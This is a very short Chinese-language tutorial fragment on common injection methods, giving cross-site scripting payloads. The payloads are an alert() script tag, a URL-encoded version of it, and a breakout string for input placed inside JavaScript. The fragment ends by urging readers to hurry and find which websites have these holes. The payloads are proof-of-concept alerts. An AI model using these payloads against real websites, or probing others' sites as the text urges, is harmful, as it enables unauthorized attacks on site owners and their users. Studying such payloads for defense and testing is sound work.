常见的注入方式

1、如果别人的网页直接输出了你输入的内容，那么，很好办：

  <script>alert(901961759)</script>

就简单的注入了，通常这个使用urlencode之后是 ：

+%26lt%3bscript%26gt%3balert(901961759)%26lt%3b%2fscript%26gt%3b

那么，如果对方把你输入的变量放到了JavaScript中了，你可以这么做

?></script><script>alert(901961759)</script>

url编码工具 再次，赶快去试试，那些网站有这些漏洞吧。